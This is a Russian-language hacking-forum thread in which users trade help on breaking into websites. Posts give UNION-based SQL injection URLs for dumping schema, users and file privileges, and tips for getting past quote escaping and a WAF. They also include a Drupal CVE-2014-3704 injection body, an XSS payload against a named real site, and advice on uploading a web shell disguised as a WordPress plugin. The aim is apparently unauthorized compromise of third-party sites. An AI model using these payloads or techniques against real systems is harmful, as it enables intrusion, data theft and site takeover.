Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. izzy

    izzy New Member

    Joined:
    23 Sep 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    вопрос от начинающего
    база 5.0.95
    вот так вывожу таблицы http://www.site.com/news/readnews.php?id=2+and+1=0+union+select+1,2,3,group_concat(table_name),5,6+from+information_schema.tables--
    нахожу нужную мне таблицу например у меня modx_active_users -
    делаю так http://www.site.com/news/readnews.php?id=2+and+1=0+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_name='modx_active_users'--
    и получаю такую ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'modx_active_users\\\'--' at line 1

    так как начинающий я непойму что делаю нетак!?
     
  2. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652

    Скорее всего magic_quotes_gpc = on

    Используйте hex или char.
     
  3. reuvenmatbil

    reuvenmatbil New Member

    Joined:
    1 Sep 2012
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    стоит фильтрация на ( и ). пробовал обойти с помощью urlencode — не вышло

    что предпринять можно?
     
    #23823 reuvenmatbil, 6 Feb 2015
    Last edited: 6 Feb 2015
  4. izzy

    izzy New Member

    Joined:
    23 Sep 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    большое спасибо помог - char
     
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    кроме ( и ) еще *, WAF на and. во всех полях ругался на кодировку, кроме 4. там и вывод номральный
    Code:
    partenaires/partenaires.cgi?CAT=1+|+1=0+union+select+1,2,3,table_name,5,6+from+information_schema.tables--+&PAYS=AF
     
    _________________________
    #23825 yarbabin, 6 Feb 2015
    Last edited: 6 Feb 2015
  6. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Есть сайт со sqli (старая версия drupal) CVE-2014-3704

    Использовал следующие эксплоиты:

    http://www.exploit-db.com/exploits/34993/
    http://www.exploit-db.com/exploits/34992/
    http://www.exploit-db.com/exploits/34984/

    Но ни один не сработал, хотя и пишут, что новый пользователь был успешно создан.

    Как раскрутить я не знаю.

    Sqli при пост запросе:

    http://www.site.com/?q=node&destination=node

    name[0']=0;&name[0]=asd&pass=asd&test2=test&form_build_id=&form_id=user_login_block&op=Log%2Bin

    output:

     
    #23826 Vip77, 6 Feb 2015
    Last edited: 6 Feb 2015
  7. scr1m77

    scr1m77 Member

    Joined:
    29 Dec 2010
    Messages:
    2
    Likes Received:
    6
    Reputations:
    2
    Ничего сложного, напиши мне по контактам в профиле, объясню.
     
    1 person likes this.
  8. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Благодарю за помощь.
     
  9. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    При проверки на XSS сайт на экране "7" (не всплывающая)
    Code:
    chttp://www.mobilluck.com.ua/info.php?page=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
    2. Есть сайт с SQL но нет привилегий, а хэш пароля адимна самописный т.е не расшифруешь.. как в таком случае залить шел.
     
  10. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    а ты сам то как думаешь? :eek:
     
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    возможно WAF.

    обход авторизации? маловероятно, но попробуйте. стоит также рассмотреть и другие варианты уязвимостей
     
    _________________________
  12. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Я то думаю, что никак. Решил уточнить
    .. faza02, каким образом обойти авторизацию?
     
  13. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    есть админка вп 4.1 , доступно только установка плагина, шел грузится но не открывается
    почему то выдает
    грузу обычный пхп с евалом и echo , echo выводится, а при запросе /uploads/lit.php?e=phpinfo(); опять пишет сервер или файл не найдет.
    что в таком случае можно сделать?

    также рут в бд, но пути не раскрываются
     
    #23833 mazaxaka, 7 Feb 2015
    Last edited: 7 Feb 2015
  14. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Ну, вообще-то если ты загружаешь плагин - то шелл будет не в папке uploads. Скачай готовый плагин, замени файл на шелл, загрузи и иди по примерно такому пути: site.com/wp-content/plugins/название_плагина/файл_с_шеллом.php.
     
  15. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    csrf например
     
  16. izzy

    izzy New Member

    Joined:
    23 Sep 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    вопрос
    хочю проверить наличие File_Priv
    узнаю пользователя так http://www.site.com/news.php?id=33+and+1=0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
    получаю u1094094_sangha@дальше ip.
    далле хочу узнать наличие File_Priv вот так http://www.site.com/news.php?id=33+and+1=0+union+select+1,2,file_priv,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql.user+where+user='u1094094_sangha'--
    и получаю You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'u1094094_sangha\'--' at line 1 (совет учить английский не помог)
    что делаю нетак?
     
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    экранируются кавычки. используйте hex или char
     
    _________________________
  18. izzy

    izzy New Member

    Joined:
    23 Sep 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    как использовать char я знаю но не подошло
    а как и где конвертировать hex ?
     
  19. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    если грузить пхп а не зип то будет в папке аплоадс. но ето сути не меняет. не открывается так и так
    как я понял сервер фильтрует евал и бас64. через простой пхп echo phpinfo(); открылось, залил через бд в корень. один фиг шел не открывается пишел соединение закрыто удаленым сервером
     
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    покажите phpinfo
     
    _________________________
Thread Status:
Not open for further replies.